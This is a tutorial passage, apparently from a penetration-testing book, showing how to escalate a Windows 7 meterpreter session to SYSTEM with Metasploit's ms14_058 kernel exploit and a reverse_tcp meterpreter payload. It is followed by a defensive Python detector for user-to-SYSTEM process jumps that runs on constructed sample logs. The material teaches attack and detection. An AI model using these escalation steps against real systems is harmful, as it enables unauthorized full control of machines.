Escalating to SYSTEM on Windows 7 with Metasploit

At this point, you've just received your meterpreter connection back from the target: your foothold payload did the trick. We run getuid to see where we stand. Hmm, the username Yokwe comes back. It doesn't concern us whether this user is an administrator; what matters is that it isn't SYSTEM, the highest privilege level on the box. Even an administrator can't get away with certain things – that account is still considered user mode.

I type background to send my meterpreter session into the background so I can work at the msf prompt. Although the multi/handler exploit is still loaded, I can simply replace it. This time, we prepare our kernel attack with use exploit/windows/local/ms14_058_track_popup_menu.

In our example screen captures, we aren't displaying the options available to us, so try that out yourself with show options. Once you've selected the exploit and run this command, you'll see the SESSION option. This refers to the meterpreter sessions you've already established. Out in the field, you may have a foothold on dozens of machines; use this option to direct the attack at a specific session. At the msf prompt, use sessions -l to identify the session you need. sessions -i <id> will take you back into a session so you can issue getuid to verify your privilege level.

This can be a little confusing to set up, as you've just come from configuring your handler with a payload. Now you need to set the payload that the kernel exploit itself will deliver. In my example, I'm issuing set payload windows/meterpreter/reverse_tcp to create a connect-back meterpreter shellcode payload.

When you're ready, fire off run and cross your fingers. This is an interesting attack: by its nature, the escalation can fail without killing your session. Everything on your screen will suggest a successful exploit, complete with a new meterpreter session indicating that the shellcode was indeed executed – and yet getuid will show the same user as before. This is why the module author put in the fingers-crossed status message, hopefully privileged.

In our demo, our Windows 7 Ultimate host was indeed vulnerable. We are now running as SYSTEM. Game over.
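From the defender's side, the transition just described leaves a distinctive trace: a process running as SYSTEM whose parent ran as an ordinary interactive user, with no service, scheduled task or UAC broker in between. The script below is an added example written for this section, not code from the book or from Metasploit, and it illustrates that detection heuristic over constructed process-creation events. The event shape (EventId, ProcessId, ParentProcessId, User, ParentUser, Image) is modelled loosely on Sysmon Event ID 1, and the host name DESKTOP-W7, the PIDs and the image paths are all invented sample values. It also handles the case where ParentUser is absent, resolving the parent's account from an earlier event for that PID.

```python
"""Flag process-creation events where a child runs as a privileged service
account while its parent ran as an ordinary user. A successful local kernel
escalation produces exactly this parent/child account mismatch.

All events below are CONSTRUCTED sample data for this example; they are not
logs from the original page or from any real host.
"""
import json
from dataclasses import dataclass

# Built-in accounts that make up the Windows service tier. A child running as
# one of these whose parent ran as a normal user is the pattern we care about.
PRIVILEGED_ACCOUNTS = {
    "NT AUTHORITY\\SYSTEM",
    "NT AUTHORITY\\LOCAL SERVICE",
    "NT AUTHORITY\\NETWORK SERVICE",
}

# Newline-delimited JSON, loosely modelled on Sysmon Event ID 1 fields.
# Raw string so the JSON escapes (\\) reach json.loads intact.
SAMPLE_LOG = r"""
{"EventId": 1, "ProcessId": 1520, "ParentProcessId": 1104, "User": "DESKTOP-W7\\Yokwe", "ParentUser": "DESKTOP-W7\\Yokwe", "Image": "C:\\Users\\Yokwe\\Downloads\\payload.exe"}
{"EventId": 1, "ProcessId": 2212, "ParentProcessId": 1520, "User": "NT AUTHORITY\\SYSTEM", "Image": "C:\\Users\\Yokwe\\AppData\\Local\\Temp\\stage.exe"}
{"EventId": 1, "ProcessId": 2300, "ParentProcessId": 648, "User": "NT AUTHORITY\\SYSTEM", "ParentUser": "NT AUTHORITY\\SYSTEM", "Image": "C:\\Windows\\System32\\svchost.exe"}
{"EventId": 1, "ProcessId": 2412, "ParentProcessId": 1104, "User": "DESKTOP-W7\\Yokwe", "ParentUser": "DESKTOP-W7\\Yokwe", "Image": "C:\\Windows\\System32\\calc.exe"}
{"EventId": 1, "ProcessId": 2500, "ParentProcessId": 900, "User": "NT AUTHORITY\\SYSTEM", "Image": "C:\\Windows\\System32\\conhost.exe"}
"""


@dataclass(frozen=True)
class Finding:
    pid: int
    image: str
    user: str
    parent_pid: int
    parent_user: str


def parse_events(text):
    """Parse newline-delimited JSON events, skipping blank lines."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if line:
            events.append(json.loads(line))
    return events


def find_user_to_system_jumps(events):
    """Return one Finding per child running as a privileged account whose
    parent ran as a non-privileged user.

    ParentUser is taken from the event when present. When it is missing
    (older Sysmon builds do not emit it), the parent's account is resolved
    from the User recorded for that PID in an earlier event of the same log.
    A parent that was never seen cannot be judged and is skipped rather than
    guessed.
    """
    pid_to_user = {}
    findings = []
    for ev in events:
        if ev.get("EventId") != 1:
            continue
        pid = ev["ProcessId"]
        user = ev["User"]
        parent_pid = ev["ParentProcessId"]
        parent_user = ev.get("ParentUser") or pid_to_user.get(parent_pid)
        # Record this process before deciding, so later children resolve it.
        pid_to_user[pid] = user
        if parent_user is None:
            continue
        if user in PRIVILEGED_ACCOUNTS and parent_user not in PRIVILEGED_ACCOUNTS:
            findings.append(Finding(pid, ev["Image"], user, parent_pid, parent_user))
    return findings


if __name__ == "__main__":
    for f in find_user_to_system_jumps(parse_events(SAMPLE_LOG)):
        print(f"PID {f.pid} ({f.image}) runs as {f.user} but its parent "
              f"PID {f.parent_pid} ran as {f.parent_user}")
```

On the sample data only PID 2212 is reported: its parent was the user-mode foothold process, while the svchost.exe child has a SYSTEM parent, calc.exe never changes account, and the conhost.exe event is skipped because its parent was never observed. In a real pipeline this check would be wired to the EDR or SIEM feed rather than a string, and a short allowlist of known elevation brokers on the parent image would be added to keep the false-positive rate manageable.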
